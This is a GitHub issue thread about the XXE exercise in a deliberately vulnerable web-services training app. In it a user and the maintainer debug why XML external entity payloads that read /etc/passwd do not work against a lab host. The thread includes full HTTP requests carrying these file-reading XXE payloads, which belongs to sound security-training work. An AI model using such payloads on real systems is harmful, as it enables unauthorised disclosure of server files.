### ISSUE TITLE
XXE Vulnerability

### ISSUE THREAD

**Issue by prvnkumark** [snoopythesecuritydog/dvws#1]
Hi,

As mentioned by you, there are not many practical environments available for hacking web services, I am glad you created dvws.

I am trying to exploit XXE, and tried different payloads. Its not working. below is request and payloads which i tried.

POST /dvws/vulnerabilities/xxe/ HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.2/dvws/vulnerabilities/xxe/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
name=<name>&xxe;</name>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

and i tried to include just entity, even this does not works.

<!DOCTYPE test [<!ENTITY xxe "Hello World">]>
name=<name>&xxe;</name>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

I tried xml tag too, no luck.

<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
name=<name>&xxe;</name>

**Comment by snoopysecurity** [comment]
Hey offsecguy, is the dvws setup on Linux or Windows? 

It should work on Linux. All the payloads you used are technically correct but it needs to be slightly modified to be interpreted by the simplexml_load_string parser. The entire XXE payload needs to be in the name parameter for the XXE to be processed. I admit that this is because the simplexml_load_string's function is to take all XML value given within a parameter and convert it to string. I will defo do a rewrite with more realistic parser in the coming month.

---------------------------Example payloads (works on linux)--------------------------------------------
EDIT: Github not showing html tag here are some examples on pastebin

## http://pastebin.com/zqpVZ3mA

references: http://php.net/manual/en/function.simplexml-load-string.php

**Comment by prvnkumark** [comment]
Hey thanks for responding.

Yes I had tried on Kali Linux rolling version, and to make sure latest
debain is not blocking or preventing attack I tried on beebox old
vulnerable Ubuntu box too.

I will try entire XML inside name parameter as you suggested and let you
know.

Any particular reason to send parameter value as text and forward it to XML
parser? Can't we send data as XML ?

**Comment by snoopysecurity** [comment]
It was a mistake on my part e.g. the way I implemented it. Most real scenarios I've seen takes the entire request to be processed. Cheers for pointing this out. Will do an update soon. :)

**Comment by snoopysecurity** [comment]
added xxe2. This one is a bit better and works as intended.

**Comment by prvnkumark** [comment]
Perfect, works great :)

Hope in future you will add other vulnerabilities as you have listed in your to-do list. Please let me know if i could contribute in any way, i am not very good in development, however i can take some task which may be time consuming and repetitive for you.

**Comment by snoopysecurity** [comment]
Ok will do, thanks
